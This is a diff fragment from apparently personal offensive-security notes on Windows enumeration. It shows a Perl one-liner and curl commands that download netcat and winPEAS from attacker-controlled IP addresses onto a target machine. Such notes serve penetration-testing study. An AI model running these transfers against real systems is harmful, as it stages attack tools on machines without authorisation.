grandMa5ter/Cyber-Sec-Notes/offensive/enumeration-windows.md

 - Download a file using PERL:
   `perl -le "use File::Fetch; my $ff = File::Fetch->new(uri => 'http://10.10.10.10/nc.exe'); my $file = $ff->fetch() or die $ff->error;"`

+### Uploading Files with curl

+- Sometimes a Windows machine will have development tools like CURL installed.
+Check for CURL: `curl -v` `curl 10.10.14.23:8080/winPEASEany.exe -o winpeas.exe`

 ### Uploading Files with FTP